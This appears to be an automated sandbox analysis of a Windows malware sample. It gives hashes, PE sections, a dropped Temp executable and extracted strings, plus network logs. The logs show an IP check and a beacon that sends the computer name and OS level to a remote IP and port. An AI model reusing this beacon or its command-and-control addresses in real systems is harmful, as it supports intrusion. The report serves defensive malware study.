Analysis Date2015-05-16 14:35:40
MD5413c96aa5ba28d9662eebc84c2f7a2ce
SHA1196c0b4c37f76305bd99188cb3e05d9403cb1610

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: 1d3230314fef6547fb87499f517aebea sha1: 3902b3e4681db03526aecc2d5fd0e3845cb7ed0b size: 2048
Section.XDATA md5: 6ff1b993379dee4baf9839e9b90aa8e3 sha1: d9c1fdb64d4a05744e581fac0b247a56b5d3c186 size: 10240
Section.RSRC md5: c31c738dca8af47f636ddcc9f68e7659 sha1: 112c148cb763d3be3c119b11b52d8078953e42b1 size: 18944
Sectionrelac md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.dAte md5: 53e979547d8c2ea86560ac45de08ae25 sha1: 53ea2cb716f312714685c92b6be27e419f8c746c size: 1536
Section.dAte md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Timestamp1997-10-28 22:08:58
PEhash303ff437fdfcf63a96ade161769ed165474e1148
IMPhashdcba06312bdb1f6f83074da6658ac80e

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\loremoment.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\LOREE50E.txt
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\loremoment.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\loremoment.exe

Network Details:

DNSicanhazip.com
Type: A
104.130.28.231
DNSicanhazip.com
Type: A
23.253.254.67
DNSicanhazip.com
Type: A
166.78.246.145
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
HTTP GEThttp://91.211.17.201:13342/MO12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Flows TCP192.168.1.1:1031 ➝ 104.130.28.231:80
Flows TCP192.168.1.1:1032 ➝ 91.211.17.201:13342
Flows TCP192.168.1.1:1033 ➝ 67.219.166.113:443
Flows TCP192.168.1.1:1034 ➝ 67.219.166.113:443
Flows TCP192.168.1.1:1035 ➝ 67.219.166.113:443
Flows TCP192.168.1.1:1036 ➝ 67.219.166.113:443
Flows TCP192.168.1.1:1037 ➝ 194.106.166.22:443
Flows TCP192.168.1.1:1038 ➝ 194.106.166.22:443
Flows TCP192.168.1.1:1039 ➝ 194.106.166.22:443
Flows TCP192.168.1.1:1040 ➝ 194.106.166.22:443
Flows TCP192.168.1.1:1041 ➝ 93.87.3.169:443
Flows TCP192.168.1.1:1042 ➝ 93.87.3.169:443
Flows TCP192.168.1.1:1043 ➝ 93.87.3.169:443
Flows TCP192.168.1.1:1044 ➝ 93.87.3.169:443
Flows TCP192.168.1.1:1045 ➝ 79.101.2.254:443
Flows TCP192.168.1.1:1046 ➝ 79.101.2.254:443
Flows TCP192.168.1.1:1047 ➝ 79.101.2.254:443
Flows TCP192.168.1.1:1048 ➝ 79.101.2.254:443
Flows TCP192.168.1.1:1049 ➝ 79.101.42.247:443
Flows TCP192.168.1.1:1050 ➝ 79.101.42.247:443
Flows TCP192.168.1.1:1051 ➝ 79.101.42.247:443
Flows TCP192.168.1.1:1052 ➝ 79.101.42.247:443
Flows TCP192.168.1.1:1053 ➝ 178.219.10.23:443
Flows TCP192.168.1.1:1054 ➝ 178.219.10.23:443
Flows TCP192.168.1.1:1055 ➝ 178.219.10.23:443
Flows TCP192.168.1.1:1056 ➝ 178.219.10.23:443
Flows TCP192.168.1.1:1057 ➝ 178.79.58.28:443
Flows TCP192.168.1.1:1058 ➝ 178.79.58.28:443
Flows TCP192.168.1.1:1059 ➝ 178.79.58.28:443
Flows TCP192.168.1.1:1060 ➝ 216.245.211.242:443
Flows TCP192.168.1.1:1061 ➝ 216.245.211.242:443
Flows TCP192.168.1.1:1062 ➝ 65.79.201.39:443
Flows TCP192.168.1.1:1063 ➝ 65.79.201.39:443
Flows TCP192.168.1.1:1064 ➝ 69.8.48.221:443
Flows TCP192.168.1.1:1065 ➝ 69.8.48.221:443
Flows TCP192.168.1.1:1066 ➝ 178.79.58.27:443
Flows TCP192.168.1.1:1067 ➝ 178.79.58.27:443
Flows TCP192.168.1.1:1068 ➝ 212.69.7.79:443
Flows TCP192.168.1.1:1069 ➝ 212.69.7.79:443
Flows TCP192.168.1.1:1070 ➝ 178.79.58.15:443
Flows TCP192.168.1.1:1071 ➝ 178.79.58.15:443
Flows TCP192.168.1.1:1072 ➝ 69.9.204.37:443
Flows TCP192.168.1.1:1073 ➝ 69.9.204.37:443
Flows TCP192.168.1.1:1074 ➝ 67.207.228.144:443
Flows TCP192.168.1.1:1075 ➝ 67.207.228.144:443
Flows TCP192.168.1.1:1076 ➝ 38.124.60.82:443
Flows TCP192.168.1.1:1077 ➝ 38.124.60.82:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 574f5736 343b2072   NT 6.1; WOW64; r
0x00000060 (00096)   763a3337 2e302920 4765636b 6f2f3230   v:37.0) Gecko/20
0x00000070 (00112)   31303031 30312046 69726566 6f782f33   100101 Firefox/3
0x00000080 (00128)   372e300d 0a486f73 743a2069 63616e68   7.0..Host: icanh
0x00000090 (00144)   617a6970 2e636f6d 0d0a4361 6368652d   azip.com..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f4d4f31 322f434f 4d505554   GET /MO12/COMPUT
0x00000010 (00016)   45522d58 58585858 582f302f 35312d53   ER-XXXXXX/0/51-S
0x00000020 (00032)   50332f30 2f204854 54502f31 2e310d0a   P3/0/ HTTP/1.1..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 352e3020 2857696e 646f7773   lla/5.0 (Windows
0x00000050 (00080)   204e5420 362e313b 20574f57 36343b20    NT 6.1; WOW64; 
0x00000060 (00096)   72763a33 372e3029 20476563 6b6f2f32   rv:37.0) Gecko/2
0x00000070 (00112)   30313030 31303120 46697265 666f782f   0100101 Firefox/
0x00000080 (00128)   33372e30 0d0a486f 73743a20 39312e32   37.0..Host: 91.2
0x00000090 (00144)   31312e31 372e3230 313a3133 3334320d   11.17.201:13342.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..


Strings
~+$%%%%*%-%*+*)
 $!%%%+
.%:)+****
04<49,44""
#04<9<<<977
2Z,.O<
"400994<4<<44,
.4+,4440D,"
4?B?B?1??B;
)8,--44-
<;;9<999</
<99??KKNKKK?;9
%9??K??K?5
ApphelpCheckExe
ApphelpCheckIME
ApphelpCheckInstallShieldPackage
ApphelpCheckMsiPackage
ApphelpCheckRunApp
ApphelpCheckShellObject
apphelp.dll
ApphelpFixMsiPackage
ApphelpFixMsiPackageExe
ApphelpFreeFileAttributes
ApphelpGetFileAttributes
ApphelpGetNTVDMInfo
ApphelpQueryModuleData
ApphelpShowDialog
ApphelpUpdateCacheEntry
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AtlAxAttachControl
AtlComPtrAssign
atl.dll
b<<<?<N<B494
%BRKKKKMGN5lzstL@IKhsvz];GGCosvzzhGHHKHKHHKGB
CAGetCACertificate
CAGetCAExpiration
CAGetCAFlags
CAGetCAProperty
CAGetCASecurity
CAGetCertTypeExpiration
CAGetCertTypeExtensions
CAGetCertTypeExtensionsEx
CAGetCertTypeFlags
CAGetCertTypeFlagsEx
CAGetCertTypeKeySpec
CAGetCertTypeProperty
CAGetCertTypePropertyEx
CAGetDN
CAInstallDefaultCertType
CAIsCertTypeCurrent
CAOIDAdd
CAOIDCreateNew
CAOIDDelete
[catBR
catsrv.DLL
certcli.dll
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
@.dAte
DeleteAtom
#%DK<<N<<//
EmAm8e
ExitProcess
FmtIdToPropStgName
FreePropVariantArray
$FxH,B
GetCatalogCRMClerk
GetCommandLineA
GetCommState
GetOEMCP
GetSystemDirectoryA
GetTickCount
%%HHM@@@KHHITNGKM@CHNNKKICIIMNKRMIHMHMHHMMMG@
Hiwww7Mi
%HKGGGGGKKGIIRKKGNKKMGIIGGRKNMGGKKKMGMMHGMMM@
IASGetDictionary
iassvcs.dll
I_NetLogonSamLogoff
I_NetLogonSamLogon
I_NetLogonSamLogonEx
I_NetLogonSamLogonWithFlags
I_NetLogonSendToSam
I_NetLogonUasLogoff
I_NetLogonUasLogon
I_NetServerAuthenticate
I_NetServerAuthenticate2
iprop.dll
Jl2H8iM
kernel32.dll
&K??KKNKKKB
{{krr{
loadperf.dll
LsExpandSubline
	)}]M.
mpr.dll
msls31.dll
msvcrt.dll
nddeapi.dll
NDdeSetTrustedShareW
netapi32.dll
NJwy[q)
nkpnkkmkkpppkkmknnknkknnnnkpmk|
odbc32.dll
OpenComponentLibraryTS
PropStgNameToFmtId
PropVariantClear
PropVariantCopy
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
;%RKKKKK5K/
{rrffff{
$rsjq8
SdbCloseDatabase
SdbReadBinaryTag
</security>
<security>
SetErrorMode
SetFilePointer
SetServiceAsTrustedA
 SKG2g
SQLCloseCursor
SQLColAttribute
SQLColAttributeA
SQLColAttributes
SQLColAttributesA
SQLColAttributesW
SQLColAttributeW
SQLColumnPrivileges
SQLColumnPrivilegesA
SQLColumnPrivilegesW
SQLGetConnectAttrA
SQLGetConnectAttrW
SQLGetConnectOption
SQLGetConnectOptionA
SQLGetConnectOptionW
StgCreatePropSetStg
StgCreatePropStg
StgOpenPropStg
!This program cannot be run in DOS mode.
't>}Nt
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
trv.JR
Twww7spHq
u*+88++%+*****)
UB?B?1??B<<4
_uTPjdhX
vd6cqL
VwwwIi
WNetGetUserA
WNetGetUserW
WNetLogonNotify
WNetOpenEnumA
WNetOpenEnumW
WNetPropertyDialogA
WNetPropertyDialogW
wwwwL*
@.XDATA
y_h(-<
Y<;N9?9?;049
z/9NHKHKHHKG<B9